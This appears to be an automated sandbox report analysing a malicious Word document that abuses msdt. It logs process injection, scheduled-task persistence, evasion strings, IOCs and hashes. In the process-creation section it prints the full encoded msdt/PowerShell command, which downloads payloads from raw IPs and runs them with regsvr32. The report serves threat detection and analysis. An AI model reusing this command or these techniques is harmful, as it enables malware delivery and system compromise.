                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.muiJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dllJump to dropped file

                            Boot Survival

                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 115F380 value: E9 40 6E 64 FF Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: 115F380 value: E9 40 6E E4 FF Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: 115F380 value: E9 40 6E AD FF Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 6020Thread sleep count: 58 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 7144Thread sleep count: 73 > 30
                            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_26-13464
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1185Jump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 425Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_26-11570
                            Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EDD62 GetSystemInfo,26_2_049EDD62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EBCFC FindFirstFileW,FindNextFileW,26_2_049EBCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0536BCFC FindFirstFileW,FindNextFileW,27_2_0536BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B9BCFC FindFirstFileW,FindNextFileW,28_2_05B9BCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007ABCFC FindFirstFileW,FindNextFileW,33_2_007ABCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EEEBB LoadLibraryA,GetProcAddress,26_2_049EEEBB
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guardJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007A5FF2 RtlAddVectoredExceptionHandler,33_2_007A5FF2

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 7D0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: FD0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C60000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 7D0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: FD0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: C60000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 7D0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 115F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: FD0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: 115F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: C60000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: 115F380 value: E9Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                            Source: C:\Windows\SysWOW64\msdt.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exe; Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\explorer.exe; Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\msdt.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\explorer.exe; Code function: 33_2_007A36AA CreateNamedPipeA
                            Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 26_2_049EA065 GetSystemTimeAsFileTime
                            Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 26_2_049EDF3D GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory strings: bdagent.exe, vsserv.exe, avp.exe, avgcsrvx.exe, mcshield.exe, MsMpEng.exe

                            Stealing of Sensitive Information


                            Remote Access Functionality


| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 412 Process Injection | 11 Masquerading | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 11 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 3 Native API | Logon Script (Windows) | 1 DLL Side-Loading | 1 Disable or Modify Tools | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 12 Exploitation for Client Execution | Logon Script (Mac) | Logon Script (Mac) | 412 Process Injection | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 21 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 File and Directory Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 16 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

                            [Behavior graph. ID: 640879, Sample: doc782.docx, Startdate: 07/06/2022, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| doc782.docx | 23% | Virustotal | |
| doc782.docx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll | 0% | Metadefender | |
| C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll | 0% | ReversingLabs | |
| C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui | 0% | Metadefender | |
| C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 36.0.explorer.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 36.2.explorer.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 34.0.explorer.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 27.2.regsvr32.exe.5360000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 26.2.regsvr32.exe.49e0000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 27.2.regsvr32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 |
| 26.2.regsvr32.exe.44f0000.1.unpack | 100% | Avira | HEUR/AGEN.1232827 |
| 41.2.regsvr32.exe.2e40000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 |
| 33.2.explorer.exe.7a0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 34.2.explorer.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 41.2.regsvr32.exe.3440000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 28.2.regsvr32.exe.4270000.1.unpack | 100% | Avira | HEUR/AGEN.1232827 |
| 33.0.explorer.exe.7a0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
| 28.2.regsvr32.exe.5b90000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |

                            No Antivirus matches
                            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.234.247.119/123.RES | true | Avira URL Cloud: safe | unknown
http://185.234.247.119/1676044147.dat | true | Avira URL Cloud: safe | unknown
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://outlook.office365.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://webshell.suite.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typesoregsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs
IP:185.234.247.119
Domain:unknown
Country:Russian Federation
ASN:198004
ASN Name:INTERKONEKT-ASPL
Malicious:true
                                                                                                                                                                    Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                    Analysis ID:640879
Start date and time:2022-06-07 18:42:45 +02:00
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 13m 40s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Sample file name:doc782.docx
                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                                    Number of analysed new started processes analysed:42
                                                                                                                                                                    Number of new started drivers analysed:1
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.expl.evad.winDOCX@31/32@0/1
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 25.4% (good quality ratio 24.2%)
                                                                                                                                                                    • Quality average: 78.3%
                                                                                                                                                                    • Quality standard deviation: 26.1%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 109
                                                                                                                                                                    • Number of non-executed functions: 75
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .docx
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                    • Scroll down
                                                                                                                                                                    • Close Viewer
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.68, 52.109.12.23, 52.109.76.35, 52.109.12.24, 20.54.89.106, 52.152.110.14, 20.223.24.244, 40.125.122.176
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time:18:45:55
Type:Task Scheduler
Description:Run new task: znkplrgo path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t.A"
Match:185.234.247.119
Associated Sample Name / URL:doc782.docx
Detection:malicious
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Microsoft Access Database
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):528384
                                                                                                                                                                      Entropy (8bit):0.4760941842487876
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:YGfX+h4gDYaJC4O8SFEfZ0jGBcphpWOwtZ1Ih+hVZO4Fg:bfXq9CNHMZS34O/CI
                                                                                                                                                                      MD5:5CA553367250856A875053E7D6EE9B60
                                                                                                                                                                      SHA1:F1CC1EAC7E70329E6CD662D195A2C4506B292460
                                                                                                                                                                      SHA-256:6C9453B9F1865CFEB05E34B19241D6EB26D631705DC676E164C4A128F4E8F531
                                                                                                                                                                      SHA-512:18B517A81A2E9FECA24BEE9AADA8686F31D9F9A9656938A6047F25B1328C0C1420DE30278ECDA90CE16C509ED23475CC232E93E5B57BE9E0BA8F1F7B5893CFBE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                      Entropy (8bit):2.730660070105504
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                      MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                      SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                      SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                      SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):1.4172860556164644
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:iyFNFaV:iyVu
                                                                                                                                                                      MD5:C20895323FD8135BA643DF30AFE4A176
                                                                                                                                                                      SHA1:0A1B94A5170EEE7F2E1DA2295DBFB584EBC21CBD
                                                                                                                                                                      SHA-256:5C105A8AE43DAC1B3E8293F665DB1D700F983F73FE1D0EB4D97CE8101E7C2957
                                                                                                                                                                      SHA-512:ADBC13FD712E78C10D7401A3993C21ADA9C4C42D163C04A4B81D054608E039C673A2F8EE24FF8AD4EE282682A2457E838BDCE5B97A0A4F8E92F7AEC103B09F60
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:965543. Admin.
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147863
                                                                                                                                                                      Entropy (8bit):5.358966610310439
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:vcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:uHQ9DQW+zIXLI
                                                                                                                                                                      MD5:3A73D6FABDD4916E8429919EC27AB07C
                                                                                                                                                                      SHA1:49258F61785C5789D2CC3EDDD7AA6FBBD3B1CF2E
                                                                                                                                                                      SHA-256:1D23E10FAA3264F10815F43552E770D51DC5AB981D9425299F846BB84A94E7BA
                                                                                                                                                                      SHA-512:06E490B4F04CF98A3FB0E0ABBAC44201249EA2335873C5CA869B45B058DA86145032DA1D75D4D2D4BDF62473FC720E91802FF2482397E33C3A05C08EA0F2E156
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
